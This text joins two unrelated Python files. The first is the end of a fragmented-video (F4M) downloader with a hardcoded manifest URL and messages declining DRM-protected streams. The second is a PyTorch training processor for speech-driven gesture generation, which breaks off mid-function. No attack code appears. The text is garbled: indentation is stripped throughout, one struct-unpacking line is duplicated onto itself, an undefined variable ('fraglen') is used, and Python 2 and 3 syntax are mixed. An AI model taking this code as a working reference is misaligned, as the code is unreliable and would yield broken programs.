fout.write(binascii.a2b_hex("00019209"))
def videostart(self, fragNum, fragData):
"""
Trouve le debut de la video dans un fragment
"""
start = fragData.find("mdat") + 12
# print "start ", start
# For all fragment (except frag1)
if (fragNum == 1):
start += 0
else:
# Skip 2 FLV tags
for dummy in range(2):
tagLen, = struct.unpack_from(">L", fragData, start) # Read 32 bits (big endian)
# print 'tagLen = %X' % tagLen
tagLen &= 0x00ffffff # Take the last 24 bits
# print 'tagLen2 = %X' % tagLen
start += tagLen + self.tagHeaderLen + 4 # 11 = tag header len ; 4 = tag footer len
return start
def readBoxHeader(self, data, pos=0):
boxSize, = struct.unpack_from(">L", data, pos) # Read 32 bits (big endian)struct.unpack_from(">L", data, pos) # Read 32 bits (big endian)
boxType = data[pos + 4 : pos + 8]
if boxSize == 1:
boxSize, = struct.unpack_from(">Q", data, pos + 8) # Read 64 bits (big endian)
boxSize -= 16
pos += 16
else:
boxSize -= 8
pos += 8
if boxSize <= 0:
boxSize = 0
return (pos, boxType, boxSize)
def verifyFragment(self, data):
pos = 0
fragLen = len(data)
while pos < fragLen:
pos, boxType, boxSize = self.readBoxHeader(data, pos)
if boxType == 'mdat':
slen = len(data[pos:])
# print 'mdat %s' % (slen,)
if boxSize and slen == boxSize:
return True
else:
boxSize = fraglen - pos
pos += boxSize
return False
def decodeFragment(self, fragNum, data):
fragPos = 0
fragLen = len(data)
if not self.verifyFragment(data):
print( "Skipping fragment number", fragNum)
return False
while fragPos < fragLen:
fragPos, boxType, boxSize = self.readBoxHeader(data, fragPos)
if boxType == 'mdat':
fragLen = fragPos + boxSize
break
fragPos += boxSize
while fragPos < fragLen:
packetType = self.readInt8(data, fragPos)
packetSize = self.readInt24(data, fragPos + 1)
packetTS = self.readInt24(data, fragPos + 4)
packetTS |= self.readInt8(data, fragPos + 7) << 24
if packetTS & 0x80000000:
packetTS &= 0x7FFFFFFF
totalTagLen = self.tagHeaderLen + packetSize + self.prevTagSize
# print 'decodeFragment', fragNum, packetType, packetSize, packetTS, totalTagLen
# time.sleep(1)
if packetType in (10, 11):
print( "This stream is encrypted with Akamai DRM. Decryption of such streams isn't currently possible with this script.")
return False
if packetType in (40, 41):
print( "This stream is encrypted with FlashAccess DRM. Decryption of such streams isn't currently possible with this script.")
return False
fragPos += totalTagLen
return True
def readInt8(self, data, pos):
return ord(struct.unpack_from(">c", data, pos)[0])
def readInt24(self, data, pos):
return struct.unpack_from(">L", "\0" + data[pos:pos + 3], 0)[0]
## manifest URL, Full Saved file name, WorkersThread
def main():
global NumWorkerThreads
if len(sys.argv) > 3:
NumWorkerThreads = int(sys.argv[3])
else:
NumWorkerThreads = 1
st = time.time()
x=M6('http://h264media01.ly.gov.tw:1935/vod/_definst_/mp4:300KClips/a7d6027a1ded6aa6982806f154ed24239c450e450740cf30fe001e560f0d6da5e9562172e945f005.mp4/manifest.f4m','./tmp1.flv')
#x = M6(sys.argv[1], sys.argv[2])
infos = x.getInfos()
for item in infos.items():
print( item[0]+' : '+str(item[1]))
x.download()
print 'Download time:', time.time() - st
if __name__ == "__main__":
main()
|
processor_v2.py | import datetime
import glob
import json
import librosa
import lmdb
import math
import matplotlib.pyplot as plt
import numpy as np
import os
import pickle
import pyarrow
import python_speech_features as ps
import threading
import time
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from os.path import join as jn
from torchlight.torchlight.io import IO
import utils.common as cmn
from net.embedding_space_evaluator import EmbeddingSpaceEvaluator
from net.ser_att_conv_rnn_v1 import AttConvRNN
from net.multimodal_context_net_v2 import PoseGeneratorTriModal as PGT, ConvDiscriminatorTriModal as CDT
from net.multimodal_context_net_v2 import PoseGenerator, AffDiscriminator
from utils import losses
from utils.average_meter import AverageMeter
from utils.data_preprocessor import DataPreprocessor
from utils.gen_utils import create_video_and_save
from utils.mocap_dataset import MoCapDataset
from utils.ted_db_utils import *
torch.manual_seed(1234)
rec_loss = losses.quat_angle_loss
def find_all_substr(a_str, sub):
start = 0
while True:
start = a_str.find(sub, start)
if start == -1:
return
yield start
start += len(sub) # use start += 1 to find overlapping matches
def get_epoch_and_loss(path_to_model_files, epoch='best'):
all_models = os.listdir(path_to_model_files)
if len(all_models) < 2:
return '', None, np.inf
if epoch == 'best':
loss_list = -1. * np.ones(len(all_models))
for i, model in enumerate(all_models):
loss_val = str.split(model, '_')
if len(loss_val) > 1:
loss_list[i] = float(loss_val[3])
if len(loss_list) < 3:
best_model = all_models[np.argwhere(loss_list == min([n for n in loss_list if n > 0]))[0, 0]]
else:
loss_idx = np.argpartition(loss_list, 2)
best_model = all_models[loss_idx[1]]
all_underscores = list(find_all_substr(best_model, '_'))
# return model name, best loss
return best_model, int(best_model[all_underscores[0] + 1:all_underscores[1]]), \
float(best_model[all_underscores[2] + 1:all_underscores[3]])
assert isinstance(epoch, int)
found_model = None
for i, model in enumerate(all_models):
model_epoch = str.split(model, '_')
if len(model_epoch) > 1 and epoch == int(model_epoch[1]):
found_model = model
break
if found_model is None:
return '', None, np.inf
all_underscores = list(find_all_substr(found_model, '_'))
return found_model, int(found_model[all_underscores[0] + 1:all_underscores[1]]), \
float(found_model[all_underscores[2] + 1:all_underscores[3]])
class Processor(object):
"""
Processor for emotive gesture generation
"""
def __init__(self, base_path, args, s2ag_config_args, data_loader, pose_dim, coords,
audio_sr, min_train_epochs=20, zfill=6):
self.device = torch.device('cuda:{}'.format(torch.cuda.current_device())
if torch.cuda.is_available() else 'cpu')
self.base_path = base_path
self.args = args
self.s2ag_config_args = s2ag_config_args
self.data_loader = data_loader
self.result = dict()
self.iter_info = dict()
self.epoch_info = dict()
self.meta_info = dict(epoch=0, iter=0)
self.io = IO(
self.args.work_dir_s2ag,
save_log=self.args.save_log,
print_log=self.args.print_log)
# model
self.pose_dim = pose_dim
self.coords = coords
self.audio_sr = audio_sr
if self.args.train_s2ag:
self.time_steps = self.data_loader['train_data_s2ag'].n_poses
self.audio_length = self.data_loader['train_data_s2ag'].expected_audio_length
self.spectrogram_length = self.data_loader['train_data_s2ag'].expected_spectrogram_length
self.num_mfcc = self.data_loader['train_data_s2ag'].num_mfcc_combined
self.lang_model = self.data_loader['train_data_s2ag'].lang_model
else:
self.time_steps = self.data_loader['test_data_s2ag'].n_poses
self.audio_length = self.data_loader['test_data_s2ag'].expected_audio_length
self.spectrogram_length = self.data_loader['test_data_s2ag'].expected_spectrogram_length
self.num_mfcc = self.data_loader['test_data_s2ag'].num_mfcc_combined
self.lang_model = self.data_loader['test_data_s2ag'].lang_model
self.mfcc_length = int(np.ceil(self.audio_length / 512))
self.best_s2ag_loss = np.inf
self.best_s2ag_loss_epoch = None
self.s2ag_loss_updated = False
self.min_train_epochs = min_train_epochs
self.zfill = zfill
self.train_speaker_model = self.data_loader['train_data_s2ag'].speaker_model
self.val_speaker_model = self.data_loader['val_data_s2ag'].speaker_model
self.test_speaker_model = self.data_loader['test_data_s2ag'].speaker_model
self.trimodal_generator = PGT(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
self.trimodal_discriminator = CDT(self.pose_dim)
self.use_mfcc = True
if self.use_mfcc:
self.s2ag_generator = PoseGenerator(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
mfcc_length=self.mfcc_length,
num_mfcc=self.num_mfcc,
time_steps=self.time_steps,
z_obj=self.train_speaker_model)
else:
self.s2ag_generator = PGT(self.s2ag_config_args,
pose_dim=self.pose_dim,
n_words=self.lang_model.n_words,
word_embed_size=self.s2ag_config_args.wordembed_dim,
word_embeddings=self.lang_model.word_embedding_weights,
z_obj=self.train_speaker_model)
# self.s2ag_discriminator = CDT(self.pose_dim)
self.s2ag_discriminator = AffDiscriminator(self.pose_dim)
self.evaluator_trimodal = EmbeddingSpaceEvaluator(self.base_path, self.s2ag_config_args, self.pose_dim,
self.lang_model, self.device)
self.evaluator = EmbeddingSpaceEvaluator(self.base_path, self.s2ag_config_args, self.pose_dim,
self.lang_model, self.device)
if self.args.use_multiple_gpus and torch.cuda.device_count() > 1:
self.args.batch_size *= torch.cuda.device_count()
self.trimodal_generator = nn.DataParallel(self.trimodal_generator)
self.trimodal_discriminator = nn.DataParallel(self.trimodal_discriminator)
self.s2ag_generator = nn.DataParallel(self.s2ag_generator)
self.s2ag_discriminator = nn.DataParallel(self.s2ag_discriminator)
else:
self.trimodal_generator.to(self.device)
self.trimodal_discriminator.to(self.device)
self.s2ag_generator.to(self.device)
self.s2ag_discriminator.to(self.device)
npz_path = jn(self.args.data_path, self.args.dataset_s2ag, 'npz')
os.makedirs(npz_path, exist_ok=True)
self.num_test_samples = self.data_loader['test_data_s2ag'].n_samples
if self.args.train_s2ag:
self.num_train_samples = self.data_loader['train_data_s2ag'].n_samples
self.num_val_samples = self.data_loader['val_data_s2ag'].n_samples
self.num_total_samples = self.num_train_samples + self.num_val_samples + self.num_test_samples
print('Total s2ag training data:\t\t{:>6} ({:.2f}%)'.format(
self.num_train_samples, 100. * self.num_train_samples / self.num_total_samples))
print('Training s2ag with batch size:\t{:>6}'.format(self.args.batch_size))
train_dir_name = jn(npz_path, 'train')
if not os.path.exists(train_dir_name):
self.save_cache('train', train_dir_name)
self.load_cache('train', train_dir_name)
print('Total s2ag validation data:\t\t{:>6} ({:.2f}%)'.format(
self.num_val_samples, 100. * self.num_val_samples / self.num_total_samples))
val_dir_name = jn(npz_path, 'val')
if not os.path.exists(val_dir_name):
self.save_cache('val', val_dir_name)
self.load_cache('val', val_dir_name)
else:
self.train_samples = None
self.val_samples = None
self.num_total_samples = self.num_test_samples
print('Total s2ag testing data:\t\t{:>6} ({:.2f}%)'.format(
self.num_test_samples, 100. * self.num_test_samples / self.num_total_samples))
test_dir_name = jn(npz_path, 'test')
if not os.path.exists(test_dir_name):
self.save_cache('test', test_dir_name)
self.lr_s2ag_gen = self.s2ag_config_args.learning_rate
self.lr_s2ag_dis = self.s2ag_config_args.learning_rate * self.s2ag_config_args.discriminator_lr_weight
# s2ag optimizers
self.s2ag_gen_optimizer = optim.Adam(self.s2ag_generator.parameters(),
lr=self.lr_s2ag_gen, betas=(0.5, 0.999))
self.s2ag_dis_optimizer = torch.optim.Adam(
self.s2ag_discriminator.parameters(),
lr=self.lr_s2ag_dis,
betas=(0.5, 0.999))
def load_cache(self, part, dir_name, load_full=True):
print('Loading {} cache'.format(part), end='')
if load_full:
start_time = time.time()
npz = np.load(jn(dir_name, '../full', part + '.npz'), allow_pickle=True)
samples_dict = {'extended_word_seq': npz['extended_word_seq'],
'vec_seq': npz['vec_seq'],
'audio': npz['audio'],
'audio_max': npz['audio_max'],
'mfcc_features': npz['mfcc_features'].astype(np.float16),
'vid_indices': npz['vid_indices']
}
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' took {:>6} seconds.'.format(int(np.ceil(time.time() - start_time))))
else:
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
samples_dict = {'extended_word_seq': [],
'vec_seq': [],
'audio': [],
'audio_max': [],
'mfcc_features': [],
'vid_indices': []}
for k in range(num_samples):
start_time = time.time()
npz = np.load(jn(dir_name, str(k).zfill(6) + '.npz'), allow_pickle=True)
samples_dict['extended_word_seq'].append(npz['extended_word_seq'])
samples_dict['vec_seq'].append(npz['vec_seq'])
samples_dict['audio'].append(npz['audio'])
samples_dict['audio_max'].append(npz['audio_max'])
samples_dict['mfcc_features'].append(npz['mfcc_features'].astype(np.float16))
samples_dict['vid_indices'].append(npz['vid_indices'])
time_taken = time.time() - start_time
time_remaining = np.ceil((num_samples - k - 1) * time_taken)
print('\rLoading {} cache {:>6}/{}, estimated time remaining {}.'.format(part, k + 1, num_samples,
str(datetime.timedelta(seconds=time_remaining))), end='')
for dict_key in samples_dict.keys():
samples_dict[dict_key] = np.stack(samples_dict[dict_key])
if part == 'train':
self.train_samples = samples_dict
elif part == 'val':
self.val_samples = samples_dict
elif part == 'test':
self.test_samples = samples_dict
print(' Completed.')
def save_cache(self, part, dir_name):
data_s2ag = self.data_loader['{}_data_s2ag'.format(part)]
num_samples = self.num_train_samples if part == 'train' else (self.num_val_samples if part == 'val' else self.num_test_samples)
speaker_model = self.train_speaker_model if part == 'train' else (self.val_speaker_model if part == 'val' else self.test_speaker_model)
extended_word_seq_all = np.zeros((num_samples, self.time_steps), dtype=np.int64)
vec_seq_all = np.zeros((num_samples, self.time_steps, self.pose_dim))
audio_all = np.zeros((num_samples, self.audio_length), dtype=np.int16)
audio_max_all = np.zeros(num_samples)
mfcc_features_all = np.zeros((num_samples, self.num_mfcc, self.mfcc_length))
vid_indices_all = np.zeros(num_samples, dtype=np.int64)
print('Caching {} data {:>6}/{}.'.format(part, 0, num_samples), end='')
for k in range(num_samples):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# with data_s2ag.lmdb_env.begin(write=False) as txn:
# key = '{:010}'.format(k).encode('ascii')
# sample = txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
duration = aux_info['end_time'] - aux_info['start_time']
audio_max_all[k] = np.max(np.abs(audio))
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time).detach().cpu().numpy()
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float().detach().cpu().numpy()
extended_word_seq_all[k] = extended_word_seq
vec_seq_all[k] = vec_seq
audio_all[k] = np.int16(audio / audio_max_all[k] * 32767)
mfcc_features_all[k] = mfcc_features
vid_indices_all[k] = speaker_model.word2index[aux_info['vid']]
np.savez_compressed(jn(dir_name, part, str(k).zfill(6) + '.npz'),
extended_word_seq=extended_word_seq,
vec_seq=vec_seq,
audio=np.int16(audio / audio_max_all[k] * 32767),
audio_max=audio_max_all[k],
mfcc_features=mfcc_features,
vid_indices=vid_indices_all[k])
print('\rCaching {} data {:>6}/{}.'.format(part, k + 1, num_samples), end='')
print('\t Storing full cache', end='')
full_cache_path = jn(dir_name, '../full')
os.makedirs(full_cache_path, exist_ok=True)
np.savez_compressed(jn(full_cache_path, part + '.npz'),
extended_word_seq=extended_word_seq_all,
vec_seq=vec_seq_all, audio=audio_all, audio_max=audio_max_all,
mfcc_features=mfcc_features_all,
vid_indices=vid_indices_all)
print(' done.')
def process_data(self, data, poses, quat, trans, affs):
data = data.float().to(self.device)
poses = poses.float().to(self.device)
quat = quat.float().to(self.device)
trans = trans.float().to(self.device)
affs = affs.float().to(self.device)
return data, poses, quat, trans, affs
def load_model_at_epoch(self, epoch='best'):
model_name, self.best_s2ag_loss_epoch, self.best_s2ag_loss = \
get_epoch_and_loss(self.args.work_dir_s2ag, epoch=epoch)
model_found = False
try:
loaded_vars = torch.load(jn(self.args.work_dir_s2ag, model_name))
self.s2ag_generator.load_state_dict(loaded_vars['gen_model_dict'])
self.s2ag_discriminator.load_state_dict(loaded_vars['dis_model_dict'])
model_found = True
except (FileNotFoundError, IsADirectoryError):
if epoch == 'best':
print('Warning! No saved model found.')
else:
print('Warning! No saved model found at epoch {}.'.format(epoch))
return model_found
def adjust_lr_s2ag(self):
self.lr_s2ag_gen = self.lr_s2ag_gen * self.args.lr_s2ag_decay
for param_group in self.s2ag_gen_optimizer.param_groups:
param_group['lr'] = self.lr_s2ag_gen
self.lr_s2ag_dis = self.lr_s2ag_dis * self.args.lr_s2ag_decay
for param_group in self.s2ag_dis_optimizer.param_groups:
param_group['lr'] = self.lr_s2ag_dis
def show_epoch_info(self):
best_metrics = [self.best_s2ag_loss]
print_epochs = [self.best_s2ag_loss_epoch
if self.best_s2ag_loss_epoch is not None else 0] * len(best_metrics)
i = 0
for k, v in self.epoch_info.items():
self.io.print_log('\t{}: {}. Best so far: {:.4f} (epoch: {:d}).'.
format(k, v, best_metrics[i], print_epochs[i]))
i += 1
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.epoch_info)
def show_iter_info(self):
if self.meta_info['iter'] % self.args.log_interval == 0:
info = '\tIter {} Done.'.format(self.meta_info['iter'])
for k, v in self.iter_info.items():
if isinstance(v, float):
info = info + ' | {}: {:.4f}'.format(k, v)
else:
info = info + ' | {}: {}'.format(k, v)
self.io.print_log(info)
if self.args.pavi_log:
self.io.log('train', self.meta_info['iter'], self.iter_info)
def count_parameters(self):
return sum(p.numel() for p in self.s2ag_generator.parameters() if p.requires_grad)
@staticmethod
def extend_word_seq(n_frames, lang, remove_word_timing, words, aux_info, end_time=None):
if end_time is None:
end_time = aux_info['end_time']
frame_duration = (end_time - aux_info['start_time']) / n_frames
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
if remove_word_timing:
n_words = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
n_words += 1
space = int(n_frames / (n_words + 1))
for word_idx in range(n_words):
idx = (word_idx + 1) * space
extended_word_indices[idx] = lang.get_word_index(words[word_idx][0])
else:
prev_idx = 0
for word in words:
idx = max(0, int(np.floor((word[1] - aux_info['start_time']) / frame_duration)))
if idx < n_frames:
extended_word_indices[idx] = lang.get_word_index(word[0])
# extended_word_indices[prev_idx:idx+1] = lang.get_word_index(word[0])
prev_idx = idx
return torch.Tensor(extended_word_indices).long()
@staticmethod
def words_to_tensor(lang, words, end_time=None):
indexes = [lang.SOS_token]
for word in words:
if end_time is not None and word[1] > end_time:
break
indexes.append(lang.get_word_index(word[0]))
indexes.append(lang.EOS_token)
return torch.Tensor(indexes).long()
def yield_batch_old(self, train):
batch_word_seq_tensor = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(self.args.batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((self.args.batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((self.args.batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((self.args.batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((self.args.batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((self.args.batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((self.args.batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
batch_vid_indices = torch.zeros(self.args.batch_size).long().to(self.device)
if train:
data_s2ag = self.data_loader['train_data_s2ag']
num_data = self.num_train_samples
else:
data_s2ag = self.data_loader['val_data_s2ag']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
# def load_from_txn(_txn, _i, _k):
# key = '{:010}'.format(_k).encode('ascii')
# sample = _txn.get(key)
# sample = pyarrow.deserialize(sample)
# word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
#
# # vid_name = sample[-1]['vid']
# # clip_start = str(sample[-1]['start_time'])
# # clip_end = str(sample[-1]['end_time'])
#
# duration = aux_info['end_time'] - aux_info['start_time']
# do_clipping = True
#
# if do_clipping:
# sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
# audio = make_audio_fixed_length(audio, self.audio_length)
# spectrogram = spectrogram[:, 0:self.spectrogram_length]
# mfcc_features = mfcc_features[:, 0:self.mfcc_length]
# vec_seq = vec_seq[0:data_s2ag.n_poses]
# pose_seq = pose_seq[0:data_s2ag.n_poses]
# else:
# sample_end_time = None
#
# # to tensors
# word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
# extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
# data_s2ag.remove_word_timing, word_seq,
# aux_info, sample_end_time)
# vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
# pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# # scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
# mfcc_features = torch.from_numpy(mfcc_features).float()
# audio = torch.from_numpy(audio).float()
# spectrogram = torch.from_numpy(spectrogram)
#
# batch_word_seq_tensor[_i, :len(word_seq_tensor)] = word_seq_tensor
# batch_word_seq_lengths[_i] = len(word_seq_tensor)
# batch_extended_word_seq[_i] = extended_word_seq
# batch_pose_seq[_i] = pose_seq
# batch_vec_seq[_i] = vec_seq
# batch_audio[_i] = audio
# batch_spectrogram[_i] = spectrogram
# batch_mfcc[_i] = mfcc_features
# # speaker input
# if train:
# if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
# else:
# if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[_i] = \
# torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
for i, k in enumerate(rand_keys):
if train:
word_seq = self.train_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.train_samples['pose_seq'][k]
vec_seq = self.train_samples['vec_seq'][k]
audio = self.train_samples['audio'][k] / 32767 * self.train_samples['audio_max'][k]
mfcc_features = self.train_samples['mfcc_features'][k]
aux_info = self.train_samples['aux_info'].item()[str(k).zfill(6)]
else:
word_seq = self.val_samples['word_seq'].item()[str(k).zfill(6)]
pose_seq = self.val_samples['pose_seq'][k]
vec_seq = self.val_samples['vec_seq'][k]
audio = self.val_samples['audio'][k] / 32767 * self.val_samples['audio_max'][k]
mfcc_features = self.val_samples['mfcc_features'][k]
aux_info = self.val_samples['aux_info'].item()[str(k).zfill(6)]
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
pose_seq = pose_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
# scaled_audio = np.int16(audio / np.max(np.abs(audio)) * self.audio_length)
mfcc_features = torch.from_numpy(mfcc_features).float()
audio = torch.from_numpy(audio).float()
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_audio[i] = audio
batch_mfcc[i] = mfcc_features
# speaker input
if train:
if self.train_speaker_model and self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.train_speaker_model.word2index[aux_info['vid']]])
else:
if self.val_speaker_model and self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices[i] = \
torch.LongTensor([self.val_speaker_model.word2index[aux_info['vid']]])
# with data_s2ag.lmdb_env.begin(write=False) as txn:
# threads = []
# for i, k in enumerate(rand_keys):
# threads.append(threading.Thread(target=load_from_txn, args=[i, k]))
# threads[i].start()
# for i in range(len(rand_keys)):
# threads[i].join()
yield batch_word_seq_tensor, batch_word_seq_lengths, batch_extended_word_seq, batch_pose_seq, \
batch_vec_seq, batch_audio, batch_spectrogram, batch_mfcc, batch_vid_indices
def yield_batch(self, train):
if train:
data_s2ag = self.data_loader['train_data_s2ag']
num_data = self.num_train_samples
else:
data_s2ag = self.data_loader['val_data_s2ag']
num_data = self.num_val_samples
pseudo_passes = (num_data + self.args.batch_size - 1) // self.args.batch_size
prob_dist = np.ones(num_data) / float(num_data)
for p in range(pseudo_passes):
rand_keys = np.random.choice(num_data, size=self.args.batch_size, replace=True, p=prob_dist)
if train:
batch_extended_word_seq = torch.from_numpy(
self.train_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.train_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.train_samples['audio'][rand_keys] *
self.train_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.train_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.train_samples['vid_indices'][rand_keys]
else:
batch_extended_word_seq = torch.from_numpy(
self.val_samples['extended_word_seq'][rand_keys]).to(self.device)
batch_vec_seq = torch.from_numpy(self.val_samples['vec_seq'][rand_keys]).float().to(self.device)
batch_audio = torch.from_numpy(
self.val_samples['audio'][rand_keys] *
self.val_samples['audio_max'][rand_keys, None] / 32767).float().to(self.device)
batch_mfcc_features = torch.from_numpy(
self.val_samples['mfcc_features'][rand_keys]).float().to(self.device)
curr_vid_indices = self.val_samples['vid_indices'][rand_keys]
# speaker input
batch_vid_indices = None
if train and self.train_speaker_model and\
self.train_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.train_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
elif self.val_speaker_model and\
self.val_speaker_model.__class__.__name__ == 'Vocab':
batch_vid_indices = torch.LongTensor([
np.random.choice(np.setdiff1d(list(self.val_speaker_model.word2index.values()),
curr_vid_indices))
for _ in range(self.args.batch_size)]).to(self.device)
yield batch_extended_word_seq, batch_vec_seq, batch_audio, batch_mfcc_features, batch_vid_indices
def return_batch(self, batch_size, randomized=True):
data_s2ag = self.data_loader['test_data_s2ag']
if len(batch_size) > 1:
rand_keys = np.copy(batch_size)
batch_size = len(batch_size)
else:
batch_size = batch_size[0]
prob_dist = np.ones(self.num_test_samples) / float(self.num_test_samples)
if randomized:
rand_keys = np.random.choice(self.num_test_samples, size=batch_size, replace=False, p=prob_dist)
else:
rand_keys = np.arange(batch_size)
batch_words = [[] for _ in range(batch_size)]
batch_aux_info = [[] for _ in range(batch_size)]
batch_word_seq_tensor = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_word_seq_lengths = torch.zeros(batch_size).long().to(self.device)
batch_extended_word_seq = torch.zeros((batch_size, self.time_steps)).long().to(self.device)
batch_pose_seq = torch.zeros((batch_size, self.time_steps,
self.pose_dim + self.coords)).float().to(self.device)
batch_vec_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_target_seq = torch.zeros((batch_size, self.time_steps, self.pose_dim)).float().to(self.device)
batch_audio = torch.zeros((batch_size, self.audio_length)).float().to(self.device)
batch_spectrogram = torch.zeros((batch_size, 128,
self.spectrogram_length)).float().to(self.device)
batch_mfcc = torch.zeros((batch_size, self.num_mfcc,
self.mfcc_length)).float().to(self.device)
for i, k in enumerate(rand_keys):
with data_s2ag.lmdb_env.begin(write=False) as txn:
key = '{:010}'.format(k).encode('ascii')
sample = txn.get(key)
sample = pyarrow.deserialize(sample)
word_seq, pose_seq, vec_seq, audio, spectrogram, mfcc_features, aux_info = sample
# for selected_vi in range(len(word_seq)): # make start time of input text zero
# word_seq[selected_vi][1] -= aux_info['start_time'] # start time
# word_seq[selected_vi][2] -= aux_info['start_time'] # end time
batch_words[i] = [word_seq[i][0] for i in range(len(word_seq))]
batch_aux_info[i] = aux_info
duration = aux_info['end_time'] - aux_info['start_time']
do_clipping = True
if do_clipping:
sample_end_time = aux_info['start_time'] + duration * data_s2ag.n_poses / vec_seq.shape[0]
audio = make_audio_fixed_length(audio, self.audio_length)
spectrogram = spectrogram[:, 0:self.spectrogram_length]
mfcc_features = mfcc_features[:, 0:self.mfcc_length]
vec_seq = vec_seq[0:data_s2ag.n_poses]
pose_seq = pose_seq[0:data_s2ag.n_poses]
else:
sample_end_time = None
# to tensors
word_seq_tensor = Processor.words_to_tensor(data_s2ag.lang_model, word_seq, sample_end_time)
extended_word_seq = Processor.extend_word_seq(data_s2ag.n_poses, data_s2ag.lang_model,
data_s2ag.remove_word_timing, word_seq,
aux_info, sample_end_time)
vec_seq = torch.from_numpy(vec_seq).reshape((vec_seq.shape[0], -1)).float()
pose_seq = torch.from_numpy(pose_seq).reshape((pose_seq.shape[0], -1)).float()
target_seq = convert_pose_seq_to_dir_vec(pose_seq)
target_seq = target_seq.reshape(target_seq.shape[0], -1)
target_seq -= np.reshape(self.s2ag_config_args.mean_dir_vec, -1)
mfcc_features = torch.from_numpy(mfcc_features)
